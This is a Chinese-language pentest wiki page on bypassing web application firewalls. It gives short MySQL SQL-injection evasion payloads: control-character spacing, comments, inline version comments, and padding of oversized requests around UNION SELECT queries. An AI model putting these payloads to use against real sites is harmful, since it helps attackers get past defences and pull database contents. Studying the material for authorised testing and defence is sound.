Black Front Security Team
  • 渗透测试文库
  • 前期交互阶段
    • 安全思维导图
      • 安全思维导图
        • 红队 [ 蓝军 ] 完整战术 生命周期
        • 工作组 渗透入门 [ 内网搜集实战 ]
        • 常规域渗透入门 实战细则 [ 单域 ]
        • 内网通道构建入门 实战
        • 系统提权入门 实战
        • 内网横向渗透入门 实战
        • 单机持久化控制入门 实战
        • 内网入口搜集 实战
      • 渗透思维导图
        • 信息收集思维导图
        • 文件上传绕过思维导图
    • C2前期准备
      • C2汇总
        • C2内网穿透策略
        • 红队之外网定向打点
      • 钓鱼平台搭建及应用
        • 搭建属于自己的个人邮件服务器 --EwoMai
      • XSS平台
      • 社工方案
    • 武器库
      • 漏扫爬虫
      • 漏扫选择
    • 渗透备忘录
  • 情报收集阶段
    • 基础信息收集
    • OSINT Web信息收集
    • OSINT情报框架
    • Nmap效率最大化
    • 在线信息收集汇总
  • 威胁建模阶段
    • ATT&CK威胁建模
  • 漏洞分析阶段
    • APP分析
      • Android&&IOS APP渗透测试方法checklist
      • Android APP渗透测试方法大全
    • CMS POC
      • 0-SEC---除要查询最好别打开
    • 代码审计
      • WEB安全拓展
      • PHP代码审计笔记
      • JAVA代码审计笔记
    • 加密解密
    • Scan Script
      • awvs_script_decode
  • 漏洞攻击阶段
    • Web安全
      • Web安全
      • 未授权访问汇总
    • Bypass Waf&&Webshell免杀
      • Bypass Waf
      • PHPWebshell免杀
      • JSPWebshell免杀
      • ASPWebshell免杀
    • Fuzzing-Dicts
    • Webshell
      • 一句话&&小马
      • 大马
  • 后渗透攻击阶段
    • AV探测
    • 免杀
      • PowerShell混淆
      • Shellcode混淆
      • 免杀技巧
      • 免杀综合
    • 权限提升
      • 提权辅助
      • Bypass AV
      • Linux提权
      • Windows提权
      • 第三方提权
    • 单域信息收集
      • 密码抓取
    • C2上线&&反弹Shell
      • C2上线姿势合集
      • 反弹shell的总结
    • 持久化控制
      • DLL Proxying for Persistence
    • 工具篇
      • 代理工具
      • 国内
      • 国外
        • Cobalt Strike
        • dnscat2
        • Merlin
        • Metasploit
        • ngrok内网穿透
        • Nishang
        • p0wnedShell
        • PoshC2
        • PowerShell Empire
        • Pupy Shell
  • 报告阶段
    • 日志清理
    • 报告模板
  • 关于我们
  • 友情链接
由 GitBook 提供支持
在本页
  • 0x01WAF部署模式
  • 0x02WAF绕过原理
  • 架构
  • 规则缺陷(黑白名单)
  • 协议
  • 0x03参考

这有帮助吗?

  1. 漏洞攻击阶段
  2. Bypass Waf&&Webshell免杀

Bypass Waf

0x01WAF部署模式

  • DNS解析

  • 旁路

  • 串联

    • 反向代理模式

    • 透明代理模式

  • 软件嵌入中间件 + 检测引擎模式

0x02WAF绕过原理

架构

MYSQL

超长数据包BYPASS

GET型请求转POST型 Content-Length 头长度大于4008 正常参数放置在脏数据后面,否则无效

规则缺陷(黑白名单)

MYSQL特性

select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin**

位置①
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号:/**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型:**news_id=1.1,**news_id=1E0,news_id=\N

位置②
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0。
可利用注释符号:/**/、 #test%0d%0a、 --+a
可利用括号:union(select 1,2)

位置③
可利用其他控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号:/**/、 #test%0d%0a、 --+a
可利用其他符号:+ 、- 、 ~ 、!、@

位置④
可利用其他控制字符替换空格: %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号: /**/、#test%0d%0a、 --+a
可利用数学运算以及数据类型:
union select user(),2.0from admin
union select user(),8e0from admin
union select user(),\Nfrom admin

位置⑤
可利用其他控制字符替换空格: %09,%0a,%0b,%0c,%0d,%20,%a0
可利用注释符号: /**/、#test%0d%0a、--+a
`号:union select 1 schema_name from`information_schema`.SCHEMATA limit 0,1)

内联注释:**union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/ limit 0,1)
{号: **union select 1,(select(schema_name)from {x information_schema.SCHEMATA} limit 0,1)
(号:**union select 1,(select(schema_name)from(information_schema.SCHEMATA) limit 0,1)

MYSQL

协议

0x03参考

上一页Bypass Waf&&Webshell免杀下一页PHPWebshell免杀

最后更新于4年前

这有帮助吗?

技术讨论 | 在HTTP协议层面绕过WAF - FreeBuf网络安全行业门户
Logo
GitHub - 4rat/sqlmap_chunked_proxy: sqlmap分块传输代理GitHub
Logo